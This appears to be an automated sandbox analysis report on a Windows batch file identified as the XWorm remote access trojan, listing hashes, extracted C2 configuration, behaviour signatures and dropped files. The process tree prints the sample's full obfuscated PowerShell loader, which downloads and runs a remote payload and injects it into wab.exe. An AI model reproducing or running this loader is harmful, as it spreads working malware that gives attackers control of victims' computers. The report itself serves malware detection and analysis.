Overview

overview

10

Static

static

1

kam.cmd

windows7-x64

10

kam.cmd

windows10-2004-x64

10

Analysis

  • max time kernel
    146s
  • max time network
    142s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    23-05-2024 16:38

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    kam.cmd

  • Size

    6KB

  • MD5

    37b176c0abc29ec74dede88ced6e4cf1

  • SHA1

    4aed169208162c12f26dfbe68e94e6781afcc47e

  • SHA256

    7a5335537efdf7a6becc59c61912dd6b2b56ac7a2e9315b32a0dc3f8ac500fc5

  • SHA512

    e8c36cf60ec4ac67dc60e30e8c60b58e12bd4ab522b8990faf038931bc5c93f41b144cc947847e23f09c163cf273f973d5162bf3f37b1c00f2ff7e19c54c5603

  • SSDEEP

    192:qFS6GncJ3ovYJpHx+WHCNQWq/HncI1yiRj:qFS6Gq3AYJ/+AWqPncyX

Score
10/10
xwormexecutionrattrojan

Malware Config

Extracted

Family

xworm

Version

5.0

C2

x5387400.duckdns.org:8896

Mutex

F4ssR8b386Bj6q2g

Attributes
  • install_file

    USB.exe

aes.plain

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Blocklisted process makes network request 5 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

    execution
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\kam.cmd"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2284
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -windowstyle hidden "$Kiaki = 1;$Vaabenmnd='Sub';$Vaabenmnd+='strin';$Vaabenmnd+='g';Function Hystadens($Rivalled){$Kortende=$Rivalled.Length-$Kiaki;For($Ransagningskendelsens=5;$Ransagningskendelsens -lt $Kortende;$Ransagningskendelsens+=6){$Indervrelses+=$Rivalled.$Vaabenmnd.Invoke( $Ransagningskendelsens, $Kiaki);}$Indervrelses;}function Billedhuggeren($Dmpningsfaktorernes){&($Searchlights) ($Dmpningsfaktorernes);}$Maimon=Hystadens 'skurvMSekuno Ko,tzplotti Carbl linelAdkvaaKommu/Super5ov,rl. Stje0un ud Karma( .ropWWagwiiPyruvnSyfildTelefoMultiwbrk.osUnpau artiN FibuT orma f,rly1Sj.eg0D,spe. heda0 Loya;A,fot GramWU.kamiStudin Poli6Skatt4Hoard;Bagst Svi.ex Klem6 Sale4Ambis; ,res .onocrFedervFasci:An,at1Nords2.tent1Doven.oopho0Frkap)Co cl ReturGTampoeSn,escSundhk krifocentr/Kigho2 .ooc0Radio1Mo.kr0Merce0Cents1Engol0 nthr1Leuco sn.sFKundsiMy,omr MicreVeterfOptimoLyst xR,pag/ ,xam1Knipl2 Sloo1Thwar. rore0 Trus ';$Cleanlier245=Hystadens ' overU Sam,sStangefi.dyrSta n-C,ookAHamarg nstaeSnavenPrecotisoan ';$Outgnaw=Hystadens ' .redhHaematsnappt Svkkp DiplsYe.rn:Recip/.edtp/Aa dvwS rafwsp,rtw Ta.r. H,lbsAntileEjendnUgunsdH ssesSockhpDuo eaiac.hcSe,sieCockm.Dand,cTe.rio MostmPaleo/S ubopUnvolrA.totoBeton/Gstg d R.sll .nsa/Intero eriegSemicmshivo6FjernqSlagtcPhilt ';$Kragerede=Hystadens 'Proph>Knuck ';$Searchlights=Hystadens ' genni AfteeTr,nsxOutto ';$Eradicated='Tj';$Unvision = Hystadens 'finaneUpayacFrotth nonvoS.bma Balsa%Mise aCamoupUnd,spFor,jdO.ercaOverbtDaab,aIrous% ,eds\cam uT TelecRecr,h Non,i laskcResi.kSanit.El phITena.tTrkvoeXylog Pla i& Benm&Foreg Tur.ueTillbcungulhCliteoHabuk Th nkt Epis ';Billedhuggeren (Hystadens ' Trde$AnnamgVin alvoldto Sul,b .orka .elilSting:GraphBSpasmoUdbl r Acrad.uldsi,eerbnSpatlgS.sed= Su a(BuffwcFro bmXylogdSagvo Primr/DobbecEksdi Drugg$DekleULmarkn Jun.vMuslii VentsBekl.iRut foRigkenGeoem)No di ');Billedhuggeren (Hystadens 'Manip$ paitgHyperl.nedkoPetrobP,epra ydrolI.ter:D lesJtenora.ransr AsienMang.oNg,el=A,sin$TerraOReuneuLabyrt E engnonvenG isoaBullfwT ngh.Engels.emoupGaperlTelefiZolaet Anlg( Pla.$Unf oKPr,rerDisora.ftergLys ieBism,rSlambeHipbodChople .ass) Incu ');$Outgnaw=$Jarno[0];$Cardiospermum= (Hystadens '.isas$UnanigProbalKart oS,inebmi,rea,lerflRetic:RulleSReinseOpslucSt rerEudioeLleuft PortsArbit=YahunN EpiteGala wLamfl-ForglO TilkbCl doj flogeArgotcU.yret Kvle ModarSPrivayfyldesReckotNyctaeInformsamme. unmuNkomm,eRelattPrein.Op.trWbombee Va.sbFjernCNoncolCabuliTroldeUncomnHomoet');$Cardiospermum+=$Bording[1];Billedhuggeren ($Cardiospermum);Billedhuggeren (Hystadens 'Outga$StenoSTurfieKod.scP,ixnr ontreR.tactHyd.osCauli. p.cnHharcee Smaga,olysdFloveeDomparAnalesPeize[M rge$.ndekCLgteslFrem,eindtraCloddnLo qulPorcuiNo voeAlacrrNonte2 Tols4 Ante5redni] Syld=campe$MeccaM Fraga,ilgaiLargemYo.kloJ.rdfnMel,e ');$Jumped=Hystadens 'Genn,$OctacSTraade Unsuc TarbrFirmaePhysitNyskasBoo.t.AfvrgDHankaoJust,wArtisn CalylCremaoA.kylaDryerdNonbuFNedgjiBeskrlSvigeeSemif( Ar,f$Sa.meOVejrtuHoejetUnchagA.lytnAd esaAti.gwPyr b,Inbr.$Sili.TNaphte Mdepowell,sJubiloParalf i htfSkudaeSe.esnP mpssValid) mr,l ';$Teosoffens=$Bording[0];Billedhuggeren (Hystadens ' Jack$UltragImbo.lAggreoEnf.vb Fyrta ScanlDumpi:SlurbF,ydisoMud ovgangle RbedoMedi l rgehaWi.letandenetrold= Helt(SemicTNonineS.afnsMirkstEurop-Pri,sPAgiosaKalort Triph.nsin Meiop$VelvaTTra,deSa.enoGrithsLate,ochuckf HjemfProtoeLigkinFa.ersNedsn)Do,um ');while (!$Foveolate) {Billedhuggeren (Hystadens 'Bug e$ErkyngArbe.lForsooCholebStormaSwlealClo h:Fj.nthPolsgu UnwisPistabBalbroKollin ,avld.nengr ankeeArbe tNonc =Fejls$Paus tGendirSinuauRustneM lli ') ;Billedhuggeren $Jumped;Billedhuggeren (Hystadens 'PatenS HypotMarkea SporrB ggetP lse-Zit aSNoaltl ,ataeSpongeBenzipBundf Serri4Domme ');Billedhuggeren (Hystadens 'Fremd$ D,sogEfterl OveroZest,bTressaChur,lOplad:,dervFUraadoAmak vSignaeUvennoFr,mslGenlyaPallatConteeh.spa= Cycl(I.rigTFiefdeHypoasRugkit Over-InsecP PrelaData,tParchh Care Ginse$AdeesTMulseeShlepo NedssKnibtoVejr f GlotfKommae,ishtnCh essDrvpa)Grum ') ;Billedhuggeren (Hystadens 'Ihrd $VrelsgL.quilForsvoSan tbUncreaTorywlSamvr: TurbHReaccjArcadr R,ine ,oelaOst.afMckenlNyv,reTalefdMilienartsfiSensinL.fayg Ek,ps Im r=lngde$UnautgZaphrlScrapoBajonbCo,ciaIsognlHo,ot:UdsprFLaxnei.heels S,uakI dfre xumbr Popuigip.nmMembrian.grnForbei MaarsUdbrdt AugueLft.brAmph iIndsteTrol rServenLyoneeVaretsExten+Terre+Firma%Hikha$DllesJMetriaHap ir subsnNon uoMeteo. S.utcFetico Bothu AmalnComb,tD.ivb ') ;$Outgnaw=$Jarno[$Hjreaflednings];}$Sanitetsvsenernes=303750;$Rehaul=27249;Billedhuggeren (Hystadens 'Europ$DecimgForunlCellioP.ecob WitnaSrskalAlarm:TyverZOrkidaGa,kanInt gnIndtre RodfsTarmp Diegi=Klods ,remsGOmnumeBarost,ophu-UnsadCpaatroRansanAllo,tBasile Bitrn FifotContu Brnde$ lkreT tandeOme eoprosisAutoboFavorf Polyfs,erteDe ronDermisBri a ');Billedhuggeren (Hystadens 'Ba ca$DriftgPilkolLithooTaksebTilkeaGratil bu i:PelsePUdplarLi.jeo B,igfTestde ubansStngnsSoergi.ftero Disan Plade Lan,l Thor Ascid=Tr kk Mecop[ ymfoS Chefy HooksSpandtFcpaue imebm.arto.H,dadC.iscooAp linSverivRuffle Sungr PraetEfter] Hebr:Disna:,ctinFConterConquo S.bsm ExflB HalvaMe iosVallaebeh.n6 Yndi4Unv sSSucc.tP,eumrInteriPrearnEcphogZ,rib(Refec$.lshaZInviaaFras.n ForsnRosineSan,esQuadr)skram ');Billedhuggeren (Hystadens 'Mrk i$Meditg,kovdlTraveoSamarbSvagsaVe.galPr.pl:FodfoP hretuPrec sManu,s Ar.ylDej,geBilleyDompr Teary=Tameh Defib[Tapr,S HoneyTi,ris ,ksktPari,e ,konmcr,me.BitteTHlereeSchelxU tratRinch.ravnsEFreshnIntercBa ndoHusvidNonreiPoikinSadhegAnili]F.der:Desua:CatadASmkl,SUdklaCGreb.IStvniIIvori.HundeGAkadeeCussetHjlp SHy.tetSpermrArabeiModernM,xomgTre,s(Indek$Li sePPetitrdecreodrevefSvinee D,gosBuk,hszwzriiSuperoEmb,lnRidd e,prdelHovet) Int, ');Billedhuggeren (Hystadens ' regn$prel g OrgilBeclooPageabDykkeaCal,alTrodd:Mi.roPCompuapens pDecadi Ma.grPraamaBuln r ,inakKonsti,ilflvTermi6 P,er1Sover= bea.$PolygPFor,tuXenogs MiddsR.klalSolise Shony Dep . Pes sMorsiuUigenbRlin,sPensutShopbrFiskeiOrnitnrickagDem.r(Topog$Unde.S ommaa.kistn .eski redjtManifeBrne,tPredis ra ivU skrsF lkeeFo,danAgrose.ntrerHebranGal eebackbs ,oci, ,aan$DukseR Op.yeF gbghU.artaSqu ruStbnilco.ro) Loui ');Billedhuggeren $Papirarkiv61;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2980
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Tchick.Ite && echo t"
        3⤵
          PID:2656
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Kiaki = 1;$Vaabenmnd='Sub';$Vaabenmnd+='strin';$Vaabenmnd+='g';Function Hystadens($Rivalled){$Kortende=$Rivalled.Length-$Kiaki;For($Ransagningskendelsens=5;$Ransagningskendelsens -lt $Kortende;$Ransagningskendelsens+=6){$Indervrelses+=$Rivalled.$Vaabenmnd.Invoke( $Ransagningskendelsens, $Kiaki);}$Indervrelses;}function Billedhuggeren($Dmpningsfaktorernes){&($Searchlights) ($Dmpningsfaktorernes);}$Maimon=Hystadens 'skurvMSekuno Ko,tzplotti Carbl linelAdkvaaKommu/Super5ov,rl. Stje0un ud Karma( .ropWWagwiiPyruvnSyfildTelefoMultiwbrk.osUnpau artiN FibuT orma f,rly1Sj.eg0D,spe. heda0 Loya;A,fot GramWU.kamiStudin Poli6Skatt4Hoard;Bagst Svi.ex Klem6 Sale4Ambis; ,res .onocrFedervFasci:An,at1Nords2.tent1Doven.oopho0Frkap)Co cl ReturGTampoeSn,escSundhk krifocentr/Kigho2 .ooc0Radio1Mo.kr0Merce0Cents1Engol0 nthr1Leuco sn.sFKundsiMy,omr MicreVeterfOptimoLyst xR,pag/ ,xam1Knipl2 Sloo1Thwar. rore0 Trus ';$Cleanlier245=Hystadens ' overU Sam,sStangefi.dyrSta n-C,ookAHamarg nstaeSnavenPrecotisoan ';$Outgnaw=Hystadens ' .redhHaematsnappt Svkkp DiplsYe.rn:Recip/.edtp/Aa dvwS rafwsp,rtw Ta.r. H,lbsAntileEjendnUgunsdH ssesSockhpDuo eaiac.hcSe,sieCockm.Dand,cTe.rio MostmPaleo/S ubopUnvolrA.totoBeton/Gstg d R.sll .nsa/Intero eriegSemicmshivo6FjernqSlagtcPhilt ';$Kragerede=Hystadens 'Proph>Knuck ';$Searchlights=Hystadens ' genni AfteeTr,nsxOutto ';$Eradicated='Tj';$Unvision = Hystadens 'finaneUpayacFrotth nonvoS.bma Balsa%Mise aCamoupUnd,spFor,jdO.ercaOverbtDaab,aIrous% ,eds\cam uT TelecRecr,h Non,i laskcResi.kSanit.El phITena.tTrkvoeXylog Pla i& Benm&Foreg Tur.ueTillbcungulhCliteoHabuk Th nkt Epis ';Billedhuggeren (Hystadens ' Trde$AnnamgVin alvoldto Sul,b .orka .elilSting:GraphBSpasmoUdbl r Acrad.uldsi,eerbnSpatlgS.sed= Su a(BuffwcFro bmXylogdSagvo Primr/DobbecEksdi Drugg$DekleULmarkn Jun.vMuslii VentsBekl.iRut foRigkenGeoem)No di ');Billedhuggeren (Hystadens 'Manip$ paitgHyperl.nedkoPetrobP,epra ydrolI.ter:D lesJtenora.ransr AsienMang.oNg,el=A,sin$TerraOReuneuLabyrt E engnonvenG isoaBullfwT ngh.Engels.emoupGaperlTelefiZolaet Anlg( Pla.$Unf oKPr,rerDisora.ftergLys ieBism,rSlambeHipbodChople .ass) Incu ');$Outgnaw=$Jarno[0];$Cardiospermum= (Hystadens '.isas$UnanigProbalKart oS,inebmi,rea,lerflRetic:RulleSReinseOpslucSt rerEudioeLleuft PortsArbit=YahunN EpiteGala wLamfl-ForglO TilkbCl doj flogeArgotcU.yret Kvle ModarSPrivayfyldesReckotNyctaeInformsamme. unmuNkomm,eRelattPrein.Op.trWbombee Va.sbFjernCNoncolCabuliTroldeUncomnHomoet');$Cardiospermum+=$Bording[1];Billedhuggeren ($Cardiospermum);Billedhuggeren (Hystadens 'Outga$StenoSTurfieKod.scP,ixnr ontreR.tactHyd.osCauli. p.cnHharcee Smaga,olysdFloveeDomparAnalesPeize[M rge$.ndekCLgteslFrem,eindtraCloddnLo qulPorcuiNo voeAlacrrNonte2 Tols4 Ante5redni] Syld=campe$MeccaM Fraga,ilgaiLargemYo.kloJ.rdfnMel,e ');$Jumped=Hystadens 'Genn,$OctacSTraade Unsuc TarbrFirmaePhysitNyskasBoo.t.AfvrgDHankaoJust,wArtisn CalylCremaoA.kylaDryerdNonbuFNedgjiBeskrlSvigeeSemif( Ar,f$Sa.meOVejrtuHoejetUnchagA.lytnAd esaAti.gwPyr b,Inbr.$Sili.TNaphte Mdepowell,sJubiloParalf i htfSkudaeSe.esnP mpssValid) mr,l ';$Teosoffens=$Bording[0];Billedhuggeren (Hystadens ' Jack$UltragImbo.lAggreoEnf.vb Fyrta ScanlDumpi:SlurbF,ydisoMud ovgangle RbedoMedi l rgehaWi.letandenetrold= Helt(SemicTNonineS.afnsMirkstEurop-Pri,sPAgiosaKalort Triph.nsin Meiop$VelvaTTra,deSa.enoGrithsLate,ochuckf HjemfProtoeLigkinFa.ersNedsn)Do,um ');while (!$Foveolate) {Billedhuggeren (Hystadens 'Bug e$ErkyngArbe.lForsooCholebStormaSwlealClo h:Fj.nthPolsgu UnwisPistabBalbroKollin ,avld.nengr ankeeArbe tNonc =Fejls$Paus tGendirSinuauRustneM lli ') ;Billedhuggeren $Jumped;Billedhuggeren (Hystadens 'PatenS HypotMarkea SporrB ggetP lse-Zit aSNoaltl ,ataeSpongeBenzipBundf Serri4Domme ');Billedhuggeren (Hystadens 'Fremd$ D,sogEfterl OveroZest,bTressaChur,lOplad:,dervFUraadoAmak vSignaeUvennoFr,mslGenlyaPallatConteeh.spa= Cycl(I.rigTFiefdeHypoasRugkit Over-InsecP PrelaData,tParchh Care Ginse$AdeesTMulseeShlepo NedssKnibtoVejr f GlotfKommae,ishtnCh essDrvpa)Grum ') ;Billedhuggeren (Hystadens 'Ihrd $VrelsgL.quilForsvoSan tbUncreaTorywlSamvr: TurbHReaccjArcadr R,ine ,oelaOst.afMckenlNyv,reTalefdMilienartsfiSensinL.fayg Ek,ps Im r=lngde$UnautgZaphrlScrapoBajonbCo,ciaIsognlHo,ot:UdsprFLaxnei.heels S,uakI dfre xumbr Popuigip.nmMembrian.grnForbei MaarsUdbrdt AugueLft.brAmph iIndsteTrol rServenLyoneeVaretsExten+Terre+Firma%Hikha$DllesJMetriaHap ir subsnNon uoMeteo. S.utcFetico Bothu AmalnComb,tD.ivb ') ;$Outgnaw=$Jarno[$Hjreaflednings];}$Sanitetsvsenernes=303750;$Rehaul=27249;Billedhuggeren (Hystadens 'Europ$DecimgForunlCellioP.ecob WitnaSrskalAlarm:TyverZOrkidaGa,kanInt gnIndtre RodfsTarmp Diegi=Klods ,remsGOmnumeBarost,ophu-UnsadCpaatroRansanAllo,tBasile Bitrn FifotContu Brnde$ lkreT tandeOme eoprosisAutoboFavorf Polyfs,erteDe ronDermisBri a ');Billedhuggeren (Hystadens 'Ba ca$DriftgPilkolLithooTaksebTilkeaGratil bu i:PelsePUdplarLi.jeo B,igfTestde ubansStngnsSoergi.ftero Disan Plade Lan,l Thor Ascid=Tr kk Mecop[ ymfoS Chefy HooksSpandtFcpaue imebm.arto.H,dadC.iscooAp linSverivRuffle Sungr PraetEfter] Hebr:Disna:,ctinFConterConquo S.bsm ExflB HalvaMe iosVallaebeh.n6 Yndi4Unv sSSucc.tP,eumrInteriPrearnEcphogZ,rib(Refec$.lshaZInviaaFras.n ForsnRosineSan,esQuadr)skram ');Billedhuggeren (Hystadens 'Mrk i$Meditg,kovdlTraveoSamarbSvagsaVe.galPr.pl:FodfoP hretuPrec sManu,s Ar.ylDej,geBilleyDompr Teary=Tameh Defib[Tapr,S HoneyTi,ris ,ksktPari,e ,konmcr,me.BitteTHlereeSchelxU tratRinch.ravnsEFreshnIntercBa ndoHusvidNonreiPoikinSadhegAnili]F.der:Desua:CatadASmkl,SUdklaCGreb.IStvniIIvori.HundeGAkadeeCussetHjlp SHy.tetSpermrArabeiModernM,xomgTre,s(Indek$Li sePPetitrdecreodrevefSvinee D,gosBuk,hszwzriiSuperoEmb,lnRidd e,prdelHovet) Int, ');Billedhuggeren (Hystadens ' regn$prel g OrgilBeclooPageabDykkeaCal,alTrodd:Mi.roPCompuapens pDecadi Ma.grPraamaBuln r ,inakKonsti,ilflvTermi6 P,er1Sover= bea.$PolygPFor,tuXenogs MiddsR.klalSolise Shony Dep . Pes sMorsiuUigenbRlin,sPensutShopbrFiskeiOrnitnrickagDem.r(Topog$Unde.S ommaa.kistn .eski redjtManifeBrne,tPredis ra ivU skrsF lkeeFo,danAgrose.ntrerHebranGal eebackbs ,oci, ,aan$DukseR Op.yeF gbghU.artaSqu ruStbnilco.ro) Loui ');Billedhuggeren $Papirarkiv61;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1312
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Tchick.Ite && echo t"
            4⤵
              PID:1160
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of SetWindowsHookEx
              PID:1452

      Network

      MITRE ATT&CK Matrix ATT&CK v13

      Initial Access

      Execution

      Command and Scripting Interpreter

      1
      T1059

      PowerShell

      1
      T1059.001

      Persistence

      Privilege Escalation

      Defense Evasion

      Credential Access

      Discovery

      Lateral Movement

      Collection

      Exfiltration

      Command and Control

      Impact

      Resource Development

      Reconnaissance

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
        Filesize

        344B

        MD5

        58f6029b3c98386a3b152611202c1b27

        SHA1

        c2697ab06c830fe0d5ca293533ee9e9e867aacfd

        SHA256

        fcb83985ad2dbfd61ce846a2a5e0a33bb195d008a1e5f923b7a3d75661f3081e

        SHA512

        f8399dd18cf3e1f5b8f5e997ac5acfd2d2dd8cd2df4261b2307b1ef316a83a03f36689ee0448cd363477ceb9461931761b368205b693e21320dc95450574e7fe

        Download Submit
      • C:\Users\Admin\AppData\Local\Temp\Cab1509.tmp
        Filesize

        68KB

        MD5

        29f65ba8e88c063813cc50a4ea544e93

        SHA1

        05a7040d5c127e68c25d81cc51271ffb8bef3568

        SHA256

        1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

        SHA512

        e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

        Download Submit
      • C:\Users\Admin\AppData\Local\Temp\Tar151B.tmp
        Filesize

        177KB

        MD5

        435a9ac180383f9fa094131b173a2f7b

        SHA1

        76944ea657a9db94f9a4bef38f88c46ed4166983

        SHA256

        67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

        SHA512

        1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

        Download Submit
      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\P6HJL3RCZG1H4MB2RRD4.temp
        Filesize

        7KB

        MD5

        2dae21bee484e741806a5fe8c3499c50

        SHA1

        618b3bcef02f66b2300a681fcf4b1bf588904d9d

        SHA256

        057b3768c25c64b109a107841e75d24b9ad9d24d20374789c786ee06e0805e1c

        SHA512

        6ee5323cb4e5794d9bb6da593c8d6cc8b28bd8ac5ee8e5fa46eba8aed1ff439b9ee3612beabfca1e3113f29c372be0c82affaa7a03915fd88f87c7f33737285c

        Download Submit
      • C:\Users\Admin\AppData\Roaming\Tchick.Ite
        Filesize

        430KB

        MD5

        bdadd978558699fea737d403e575031f

        SHA1

        794dccf91b26b92d478f7d749e77023822c19541

        SHA256

        236f3f6ca6e56622e271632101ab25cb05638dcca0369b00dd6662a79ae16cd2

        SHA512

        6be56d307dbf947e3d340db2a14e136cfb9998949f98216d6e31951291ec4ec73158f3c771b9448743e955e26872f6fd0ded4960aeda7d9a0163711dd6925cc4

        Download Submit
      • memory/1312-55-0x00000000066C0000-0x0000000009318000-memory.dmp
        Filesize

        44.3MB

        Download
      • memory/1452-81-0x0000000000E50000-0x0000000001EB2000-memory.dmp
        Filesize

        16.4MB

        Download
      • memory/1452-85-0x0000000000E50000-0x0000000001EB2000-memory.dmp
        Filesize

        16.4MB

        Download
      • memory/1452-86-0x0000000000E50000-0x0000000000E60000-memory.dmp
        Filesize

        64KB

        Download
      • memory/2980-56-0x000007FEF5610000-0x000007FEF5FAD000-memory.dmp
        Filesize

        9.6MB

        Download
      • memory/2980-4-0x000007FEF58CE000-0x000007FEF58CF000-memory.dmp
        Filesize

        4KB

        Download
      • memory/2980-11-0x000007FEF5610000-0x000007FEF5FAD000-memory.dmp
        Filesize

        9.6MB

        Download
      • memory/2980-6-0x0000000002340000-0x0000000002348000-memory.dmp
        Filesize

        32KB

        Download
      • memory/2980-10-0x000007FEF5610000-0x000007FEF5FAD000-memory.dmp
        Filesize

        9.6MB

        Download
      • memory/2980-57-0x000007FEF58CE000-0x000007FEF58CF000-memory.dmp
        Filesize

        4KB

        Download
      • memory/2980-5-0x000000001B5D0000-0x000000001B8B2000-memory.dmp
        Filesize

        2.9MB

        Download
      • memory/2980-9-0x000007FEF5610000-0x000007FEF5FAD000-memory.dmp
        Filesize

        9.6MB

        Download
      • memory/2980-7-0x000007FEF5610000-0x000007FEF5FAD000-memory.dmp
        Filesize

        9.6MB

        Download
      • memory/2980-8-0x000007FEF5610000-0x000007FEF5FAD000-memory.dmp
        Filesize

        9.6MB

        Download
      • memory/2980-87-0x000007FEF5610000-0x000007FEF5FAD000-memory.dmp
        Filesize

        9.6MB

        Download